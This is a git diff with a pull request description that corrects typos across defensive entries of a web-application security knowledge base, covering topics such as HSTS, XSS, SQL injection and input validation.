+unavailable due to the flooding of logs.
 
 
 **Solution:**
@@ -15,6 +15,6 @@ files are archived. Servers which run large applications, such as LAMP stacks, o
 log every request: in the face of bulky logs, log rotation is a way to limit the total
 size of the logs while still allowing analysis of recent events.
 
-Log seperation basically means that you have to store your log files on a different partition
+Log separation basically means that you have to store your log files on a different partition
 as where your OS/application is running on in order to avert a Denial of service attack or the downgrading
 of your application its performance.

--- a/skf/markdown/knowledge_base/192-knowledge_base--HTTP_strict_transport_security--.md
+++ b/skf/markdown/knowledge_base/192-knowledge_base--HTTP_strict_transport_security--.md
@@ -27,8 +27,8 @@ still needs to then go and submit the domain to the list.
 
 There is still a window where a user who has a fresh install, or who wipes out their local state, 
 is vulnerable. This is due to the fact that the browser is not yet aware of the fact if the application
-the iser is trying to connect to supports HSTS. Whenever you are added to the preload list, 
-the application its preference is hardcoded into the browser and al first initial connections will
+the it is trying to connect to supports HSTS. Whenever you are added to the preload list, 
+the application its preference is hard-coded into the browser and all first initial connections will
 always be made by HTTPS.
 
 **CAUTION**

--- a/skf/markdown/knowledge_base/193-knowledge_base--API_resonses_security_headers--.md
+++ b/skf/markdown/knowledge_base/193-knowledge_base--API_resonses_security_headers--.md
@@ -1,11 +1,11 @@
-API resonses security headers
+API responses security headers
 -------
 
 **Description:**
 
 There are some security headers which should be properly configured in order to protect some API callbacks against Reflective File Download and other type of injections.
 
-Also check that the API resonse is not dynamic, if so use input validation and encoding in order to prevent XSS and Same origin method execution attacks.
+Also check that the API response is not dynamic, if so use input validation and encoding in order to prevent XSS and Same origin method execution attacks.
 
 
 **Solution:**
@@ -16,4 +16,4 @@ Recommended knowledge base items:
 
 - Include X content type options header
 - RFD and file download injections
-- Same origin method exectution
+- Same origin method execution

--- a/skf/markdown/knowledge_base/198-knowledge_base--CRYPTO_CA_hierachy--.md
+++ b/skf/markdown/knowledge_base/198-knowledge_base--CRYPTO_CA_hierachy--.md
@@ -4,8 +4,8 @@ Strong Crypto through all the certificate hierarchy
 **Description:**
 
 When you have an offline PKI setup you need to have solid strong crypto layers.
-An attacker will look for weak chains in the hierachy and abuse them when found.
-This can lead to MiTM attacks and impact the 3 security pilars C.I.A.
+An attacker will look for weak chains in the hierarchy and abuse them when found.
+This can lead to MiTM attacks and impact the 3 security pillars C.I.A.
 
 **Solution:**
 

--- a/skf/markdown/knowledge_base/199-knowledge_base--Build_Deploy_secure--.md
+++ b/skf/markdown/knowledge_base/199-knowledge_base--Build_Deploy_secure--.md
@@ -5,9 +5,9 @@ Build and deploy in a secure fashion
 
 Using build platforms on premise or as a service is one of the core components in a SDLC.
 These build and deploy servers are sometimes not perfect for performing secure builds or deploys.
-This is becasue the lack of hardening of the OS for security improvements where the application
-could also bennefit from this hardening. Also the access of third party services can lead to 
-comrpomise of the secrets or integrity of the code of the application.
+This is because the lack of hardening of the OS for security improvements where the application
+could also benefit from this hardening. Also the access of third party services can lead to 
+compromise of the secrets or integrity of the code of the application.
 
 **Solution:**
 
@@ -15,4 +15,4 @@ Building you application should always be done on a server that you trust, you a
 has the latest security patches and hardening configured. For deploying the application the same 
 rules apply, also think about what type of third party services can access the code or modify it.
 Creating scripts to monitor for bad behavior of a third party service can be an option as an extra
-qualtiy control check.
+quality control check.

--- a/skf/markdown/knowledge_base/20-knowledge_base--Include_anti_clickjacking_headers--.md
+++ b/skf/markdown/knowledge_base/20-knowledge_base--Include_anti_clickjacking_headers--.md
@@ -6,7 +6,7 @@ Include anti clickjacking headers
 
 Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple 
 transparent or opaque layers to trick a user into clicking on a button or link on another 
-page when they were intending to click on the the top level page. Thus, the attacker is 
+page when they were intending to click on the top level page. Thus, the attacker is 
 "hijacking" clicks meant for their page and routing them to another page, most likely 
 owned by another application, domain, or both.
 
@@ -36,6 +36,6 @@ The page can only be displayed in a frame on the specified origin.
 You may also want to consider to include "Framebreaking/Framebusting" defense for legacy
 browsers that do not support X-Frame-Option headers.
 
-source:
+Source:
 https://www.codemagi.com/blog/post/194
 	

--- a/skf/markdown/knowledge_base/200-knowledge_base--Signed_application_components--.md
+++ b/skf/markdown/knowledge_base/200-knowledge_base--Signed_application_components--.md
@@ -3,10 +3,10 @@ Signed application components
 
 **Description:**
 
-When an application don't use signed application components an attacker can easly modify parts
+When an application don't use signed application components an attacker can easily modify parts
 of the application and load inject a backdoor into the application. Also the attacker could
-modify bussniss logic in the application without the application notice. Signed application 
-components can help harden your application and make it notible when an attacker tries to 
+modify business logic in the application without the application notice. Signed application 
+components can help harden your application and make it noticeable when an attacker tries to 
 modify the code in the application.
 
 

--- a/skf/markdown/knowledge_base/201-knowledge_base--Build_proccess_security_hardening--.md
+++ b/skf/markdown/knowledge_base/201-knowledge_base--Build_proccess_security_hardening--.md
@@ -1,4 +1,4 @@
-Build proccess security hardening
+Build process security hardening
 -------
 
 **Description:**

--- a/skf/markdown/knowledge_base/202-knowledge_base--Sanitize_unstructured_data--.md
+++ b/skf/markdown/knowledge_base/202-knowledge_base--Sanitize_unstructured_data--.md
@@ -13,5 +13,5 @@ Unstructured data needs to be sanitized to enforce generic safety measures for e
 - allowed characters
 - character length, 
 
-Aslo some characters are potentially harmful in given context and thus should be escaped. 
+Also some characters are potentially harmful in given context and thus should be escaped. 
 (e.g. natural names with Unicode or apostrophes, such as &#x306D;&#x3053; or O'Hara)

--- a/skf/markdown/knowledge_base/207-knowledge_base--PII_protection--.md
+++ b/skf/markdown/knowledge_base/207-knowledge_base--PII_protection--.md
@@ -6,7 +6,7 @@ Personally Identifiable Information (PII) protection measurements
 There should be extra care taken into account when you are dealing with PII in your
 application. There are multiple laws in countries that demand proper protection by
 means of SSL/TLS for when the data is in transit and encrypted with pub priv key system
-when stored on the disk. This is needed to protect the user from identity theft and fraude.
+when stored on the disk. This is needed to protect the user from identity theft and fraud.
 
 **Solution:**
 

--- a/skf/markdown/knowledge_base/25-knowledge_base--Include_Strict_Transport_Security_header--.md
+++ b/skf/markdown/knowledge_base/25-knowledge_base--Include_Strict_Transport_Security_header--.md
@@ -16,7 +16,7 @@ These headers are also known as the: Strict-Transport-Security: max-age=16070400
 includeSubDomains and provide protection against SSL Strip attacks when implemented in the
 application or webserver. 
 
-when connecting to an HSTS host for the first time, the browser won't know whether or not
+When connecting to an HSTS host for the first time, the browser won't know whether or not
 to use a secure connection, because it has never received an HSTS header from that host.
 Consequently, an active network attacker could prevent the browser from ever connecting
 securely (and even worse, the user may never realize something is amiss). To mitigate

--- a/skf/markdown/knowledge_base/28-knowledge_base--Too_verbose_authentication-failure_logging--.md
+++ b/skf/markdown/knowledge_base/28-knowledge_base--Too_verbose_authentication-failure_logging--.md
@@ -15,14 +15,14 @@ The application should never publish available usernames. When an attacker gains
 information he increases his attack vector and reduces the time 
 required to identify accounts.
 
-i.e:
+I.e:
 
 Imagine an forgot password function where the user enters his username in order for the 
 application to send a new password to his email address, the user enters a correct username
 and the application responds with:
 
 Email successfully send to your email address.
-when the user enters a incorrect username it says.
+When the user enters a incorrect username it says.
 Error: user does not exists.
 
 This function would be vulnerable to username enumeration

--- a/skf/markdown/knowledge_base/3-knowledge_base--xss_injection--.md
+++ b/skf/markdown/knowledge_base/3-knowledge_base--xss_injection--.md
@@ -5,7 +5,7 @@ XSS injection
 **Description:**
 
 Every time the application gets user-input, whether this showing it on screen or processing
-this data in the application background, these paramaters should be escaped for malicious
+this data in the application background, these parameters should be escaped for malicious
 code in order to prevent cross site scripting injections. 
 When an attacker gains the possibility to perform a XSS injection,
 he is given the opportunity to inject HTML and javascript code directly into the
@@ -22,21 +22,21 @@ This means u should not checking for malicious content like the tags or anything
 but only allowing the expected input. Every input which is outside of the intended operation
 of the application should immediately be detected, logged en rejected.
 
-The second step would be encoding al the parameters or user-input before putting this in 
+The second step would be encoding all the parameters or user-input before putting this in 
 your html with encoding libraries specially designed for this purpose. 
 
-You should take into consideration that there are several contexts for encoding userinput for
+You should take into consideration that there are several contexts for encoding user-input for
 escaping XSS injections. These contexts are amongst others:
 
 HTML encoding
-This is for whenever your userinput is displayed directly into your HTML
+This is for whenever your user-input is displayed directly into your HTML
 
 HTML attribute encoding
 This type of encoding/escaping should be applied whenever your user input is displayed into the attribute of
 your HTML tags
 
 HTML URL encoding
-This type of encoding/escaping should be applied to whenever you are using userinput into a HREF
+This type of encoding/escaping should be applied to whenever you are using user-input into a HREF
 tag.
 
 Javascript encoding

--- a/skf/markdown/knowledge_base/30-knowledge_base--Denial_of_service_by_locking_out_accounts--.md
+++ b/skf/markdown/knowledge_base/30-knowledge_base--Denial_of_service_by_locking_out_accounts--.md
@@ -4,7 +4,7 @@ Denial-of-service by locking out accounts
 
 **Description:**
 
-whenever there is offered the opportunity to log into the application it should not lock 
+Whenever there is offered the opportunity to log into the application it should not lock 
 out accounts. A hacker could abuse this function to make the application deny access 
 towards its power users.
 

--- a/skf/markdown/knowledge_base/38-knowledge_base--Session_cookies_without_the_Secure_flag--.md
+++ b/skf/markdown/knowledge_base/38-knowledge_base--Session_cookies_without_the_Secure_flag--.md
@@ -18,6 +18,6 @@ This will instruct the browser to never send the cookie over HTTP.
 The purpose of this flag is to prevent the accidental exposure of a cookie value if a user
 follows an HTTP link. 
 
-Reccomended knowledge base item:
+Recommended knowledge base item:
 
 - Session management

--- a/skf/markdown/knowledge_base/44-knowledge_base--Identifier_based_authorization--.md
+++ b/skf/markdown/knowledge_base/44-knowledge_base--Identifier_based_authorization--.md
@@ -7,7 +7,7 @@ Identifier-based authorization
 An application uses parameters in order to process data. 
 These parameters can also be used to assign certain roles and retrieve 
 
-content corresponding with those parameters. imagine the following example:
+Content corresponding with those parameters. Imagine the following example:
 
     www.target.com/index.php?loggedin=user
 
@@ -15,7 +15,7 @@ In this situation the application will get content and subscribe user roles corr
 
     www.target.com/index.php?loggedin=admin
 
-In this situation the application wil get content and subscribe user roles corresponding to the admin parameter.
+In this situation the application will get content and subscribe user roles corresponding to the admin parameter.
 
 
 **Solution:**
@@ -27,7 +27,7 @@ The userID should be stored inside of a session variable on login and should be 
 retrieve user data from the database like : SELECT data from personaldata where userID=:id <- session var
 
 Now an possible attacker can not tamper and change the application operation since the
-identifier for retrieving the data is handeld server-side.
+identifier for retrieving the data is handled server-side.
 
 
 

--- a/skf/markdown/knowledge_base/46-knowledge_base--Prepared_statements_and_query_parameterization--.md
+++ b/skf/markdown/knowledge_base/46-knowledge_base--Prepared_statements_and_query_parameterization--.md
@@ -4,7 +4,7 @@ SQL injection
 
 **Description:**
 
-all SQL queries, HQL, OSQL, NOSQL and stored procedures, calling of stored procedures should be 
+All SQL queries, HQL, OSQL, NOSQL and stored procedures, calling of stored procedures should be 
 protected by the use of query parameterization.
 If not an attacker can inject malicious code into these queries he gains the ability to 
 manipulate them and now he can withdraw, update and delete data which is stored on the 
@@ -15,7 +15,7 @@ target database.
 
 The use of prepared statements and parameterised queries is how all developers should 
 first be taught how to write database queries. They are simple to write, and easier to 
-understand than dynamic queries. parameterised queries force the developer to first define 
+understand than dynamic queries. Parameterised queries force the developer to first define 
 all the SQL code, and then pass in each parameter to the query later. This coding style 
 allows the database to distinguish between code and data, regardless of what user input 
 is supplied.

--- a/skf/markdown/knowledge_base/51-knowledge_base--Are_all_passwords_hashed,_salted_and_stretched--.md
+++ b/skf/markdown/knowledge_base/51-knowledge_base--Are_all_passwords_hashed,_salted_and_stretched--.md
@@ -11,7 +11,7 @@ abuse the password when obtained.
 **Solution:**
 
 A user should always be forced to use a proper password when signing in into the application. 
-Preferably a pass-phrase instead of a password. this in order to extend the duration 
+Preferably a pass-phrase instead of a password. This in order to extend the duration 
 of a brute-force attack.
 
 Verify that account passwords are protected using an adaptive key derivation function.

--- a/skf/markdown/knowledge_base/53-knowledge_base--Session_information_is_not_stored_server_side--.md
+++ b/skf/markdown/knowledge_base/53-knowledge_base--Session_information_is_not_stored_server_side--.md
@@ -10,6 +10,6 @@ and manipulate these values. This is always a bad idea and you should not do thi
 
 **Solution:**
 
-Session information should aways be stored server-side by means of a server-side language.
+Session information should always be stored server-side by means of a server-side language.
 
 	

--- a/skf/markdown/knowledge_base/6-knowledge_base--XXE_injections--.md
+++ b/skf/markdown/knowledge_base/6-knowledge_base--XXE_injections--.md
@@ -19,6 +19,6 @@ contain sensitive data such as passwords or private
 **Solution:**
 
 Disable the possibility to fetch resources from an external source.
-This is normally done in the config of the used XML parser.
+This is normally done in the configuration of the used XML parser.
 
 	

--- a/skf/markdown/knowledge_base/61-knowledge_base--Directory_listing--.md
+++ b/skf/markdown/knowledge_base/61-knowledge_base--Directory_listing--.md
@@ -14,6 +14,6 @@ credentials or old vulnerable system demo functions which might lead to remote c
 **Solution:**
 
 Different types of servers require a different type of approach in order to disable 
-directory listing. for instance: apache uses a .htacces in order to disable directory listing.
+directory listing. For instance: apache uses a .htacces in order to disable directory listing.
 As in iis7 directory listing is disabled by default. 
 

--- a/skf/markdown/knowledge_base/62-knowledge_base--Unnecessary_features_enabled_or_installed--.md
+++ b/skf/markdown/knowledge_base/62-knowledge_base--Unnecessary_features_enabled_or_installed--.md
@@ -10,7 +10,7 @@ the attack vector which could lead to serious danger such as XXE/CMD/XSS injecti
 
 **Solution:**
 
-Make sure al features and software available on the application/server is necessary for 
-application to work proper. if not, uninstall or disable these services.
+Make sure all features and software available on the application/server is necessary for 
+application to work proper. If not, uninstall or disable these services.
 
 	

--- a/skf/markdown/knowledge_base/63-knowledge_base--Avoid_the_use_of_default_and_predictable_acounts.--.md
+++ b/skf/markdown/knowledge_base/63-knowledge_base--Avoid_the_use_of_default_and_predictable_acounts.--.md
@@ -5,7 +5,7 @@ Avoid the use of default and predictable accounts
 **Description:**
 
 Whenever default or predictable accounts are available on an application/server this could 
-lead to an attacker compromising these services. Make sure al default and predictable 
+lead to an attacker compromising these services. Make sure all default and predictable 
 accounts are disabled or deleted from the services. 
 
 

--- a/skf/markdown/knowledge_base/64-knowledge_base--Security_settings_in_your_development_frameworks--.md
+++ b/skf/markdown/knowledge_base/64-knowledge_base--Security_settings_in_your_development_frameworks--.md
@@ -12,6 +12,6 @@ to vulnerabilities in your application which an attacker could exploit.
 
 **Solution:**
 
-Make sure al your security settings in your development framework are set to secure values. 
+Make sure all your security settings in your development framework are set to secure values. 
 This can be checked by using hardening guides.
 	

--- a/skf/markdown/knowledge_base/68-knowledge_base--Incorrect_or_missing_charset--.md
+++ b/skf/markdown/knowledge_base/68-knowledge_base--Incorrect_or_missing_charset--.md
@@ -10,7 +10,7 @@ the application, then this could could lead to XSS injections when guessing wron
 
 **Solution:**
 
-Define the charset for al your pages in order to prevent the browser for guessing 
+Define the charset for all your pages in order to prevent the browser for guessing 
 the content types.
 
 This could be done by adding a meta header in the head of your HTML like:

--- a/skf/markdown/knowledge_base/71-knowledge_base--HTTP_header_injection--.md
+++ b/skf/markdown/knowledge_base/71-knowledge_base--HTTP_header_injection--.md
@@ -19,7 +19,7 @@ feasible due to the fact that multiple header requests are not possible.
 **Solution:**
 
 When user-input will be used in HTTP headers then the newlines should be escaped in a 
-correct manner. Reccomended would be a whitelist of expected input or use a validation method
-which for example only accepts alphanummeric values. Every detection of input which is out of 
+correct manner. Recommended would be a whitelist of expected input or use a validation method
+which for example only accepts alphanumeric values. Every detection of input which is out of 
 the intended operation should be rejected. 
 

--- a/skf/markdown/knowledge_base/72-knowledge_base--GET_POST_requests--.md
+++ b/skf/markdown/knowledge_base/72-knowledge_base--GET_POST_requests--.md
@@ -16,8 +16,8 @@ XSS manual in the knowledge base for more information.
 **Solution:**
 
 Whenever transmitting sensitive data always do this by means of the POST request or by header.
-note: Avoid userinput in your application header, this could lead to vulnerabilities.
-Also make sure you also disable al other HTTP request methods which are unnecessary for
+Note: Avoid user-input in your application header, this could lead to vulnerabilities.
+Also make sure you also disable all other HTTP request methods which are unnecessary for
 your applications operation such as: REST, PUT, TRACE, DELETE, OPTIONS, etc, since
 allowing these other request methods could lead to vulnerabilities and injections.
 

--- a/skf/markdown/knowledge_base/73-knowledge_base--Insecure_internal_communication--.md
+++ b/skf/markdown/knowledge_base/73-knowledge_base--Insecure_internal_communication--.md
@@ -12,7 +12,7 @@ could easily sniff these insecure communication and gain sensitive information.
 
 Use TLS encrypted data lines for all internal communication channels.
 Also your infrastructure should not traverse unencrypted or weakly encrypted links. Because
-if so, than al your data's integrity and confidentiality will be lost.
+if so, than all your data's integrity and confidentiality will be lost.
 
 
 

--- a/skf/markdown/knowledge_base/76-knowledge_base--Possible_attackers_of_the_application_must_be_documented--.md
+++ b/skf/markdown/knowledge_base/76-knowledge_base--Possible_attackers_of_the_application_must_be_documented--.md
@@ -19,7 +19,7 @@ Recommended knowlege-base items:
 - User credentials in audit logs
 - Log injection
 - Repudiation attacks
-- Logging guidelinges
+- Logging guidelines
 - Logging is performed before executing the transaction
 
 

--- a/skf/markdown/knowledge_base/79-knowledge_base--Intrusion_detecting_and_reporting--.md
+++ b/skf/markdown/knowledge_base/79-knowledge_base--Intrusion_detecting_and_reporting--.md
@@ -15,7 +15,7 @@ Intrusion detecting could be done by means of a:
 "Positive security model:"
 In this model you create certain regular expressions in order to only make the application 
 pass the so called "known good".
-whenever an application detects strange behaviour and anomalies, 
+Whenever an application detects strange behaviour and anomalies, 
 these issues should be reported. Keep in mind whenever the application changes this 
 whitelist method has to evolve alongside with it. A big con is it could generate a lot 
 of reports and alerts.

--- a/skf/markdown/knowledge_base/91-knowledge_base--Verify_that_the_session_id_is_never_disclosed--.md
+++ b/skf/markdown/knowledge_base/91-knowledge_base--Verify_that_the_session_id_is_never_disclosed--.md
@@ -5,7 +5,7 @@ Verify that the session id is never disclosed
 **Description:**
 
 If the session id is disclosed in the URL the users session id can be easily obtained by 
-an attacker and could leak through the referer header towards other severs. Also whenever 
+an attacker and could leak through the referrer header towards other severs. Also whenever 
 the session id is disclosed in the URL the possibility also arises to perform other 
 attacks like session fixation which could lead to session hijacking.
 

--- a/skf/markdown/knowledge_base/94-knowledge_base--Input_rejection--.md
+++ b/skf/markdown/knowledge_base/94-knowledge_base--Input_rejection--.md
@@ -11,18 +11,18 @@ the application actual rejects the submitted user-input rather than directly pro
 **Solution:**
 
 Verify that the application actually rejects the user requests whenever malicious input
-is detected by your application. The base of this process wil be checking the application
+is detected by your application. The base of this process will be checking the application
 for expected user-input, for example: Whenever the user is filling in a form which 
 contains a checkbox, there are fixed values which your application can expect from
 the user to return. Whenever this value differs from what the application served the user
 as possible answers, you can assume the request was corrupted and you reject the request.
 
-you must also keep track of the users movements by adding an audit trail as wel as an
+You must also keep track of the users movements by adding an audit trail as well as an
 counter for tracking the number of his violations(submitting bad input) in your input 
 validation class. You should enforce a lockout whenever a unreasonable number of 
 violations are detected by your application in order to protect it from attackers.
 
-Reccomended knowledge base items:
+Recommended knowledge base items:
 
 - Input validation
 - Client side input validation

--- a/skf/markdown/knowledge_base/95-knowledge_base--Input_validation--.md
+++ b/skf/markdown/knowledge_base/95-knowledge_base--Input_validation--.md
@@ -12,14 +12,14 @@ these checks with an intercepting proxy.
 
 All input validation and encoding-routines should be implemented on the server-side 
 outside the reach of an attacker. Just as with the input rejection you should make sure that
-after validating the userinput, whenever the input is bad it actually rejects, sanitises 
+after validating the user-input, whenever the input is bad it actually rejects, sanitises 
 or formats your user-input into not malicious data. 
 
 The recommended method for validating user input would be the positive validation method.
 White-list input validation means allowing only input that is explicitly defined as valid,
 as opposed to black-list input validation, which filters out known bad input.
 
-you must also keep track of the users movements by adding an audit trail as wel as an
+You must also keep track of the users movements by adding an audit trail as well as an
 counter for tracking the number of his violations(submitting bad input) in your input 
 validation class. You should enforce a lockout whenever a unreasonable number of 
 violations are detected by your application in order to protect it from attackers.
@@ -33,7 +33,7 @@ This also goes for whenever you are expecting just an integer or alphanumeric va
 Every detection of input outside of the intended operation of the application should be 
 logged and rejected by your application. 
 
-note: All this validation and rejection should always be perfomed on the server side.
+Note: All this validation and rejection should always be performed on the server side.
 
 Recommended knowledge base items:
 

--- a/skf/markdown/knowledge_base/96-knowledge_base--Single_input_validation_controls--.md
+++ b/skf/markdown/knowledge_base/96-knowledge_base--Single_input_validation_controls--.md
@@ -11,10 +11,10 @@ and most application risks involve tainted input at some level.
 **Solution:**
 
 Verify that a single input validation control is used by the application for each 
-type of data that is accepted. This way your validation controls stay clear, transpirant
+type of data that is accepted. This way your validation controls stay clear, transparent
 and manageable. This method leaves less room for error.
 
-Recomended knowledge base items:
+Recommended knowledge base items:
 
 - Positive validation method
 - Input validation


### PR DESCRIPTION
The typos were found by a semi-automatic sweep using vim's spellchecker
(:set spell). Agreeing on a language (en_US vs. en_GB) and automating
spellchecking in this project would make sense..

Signed-off-by: Mathias Nyman <mathias.nyman@iki.fi>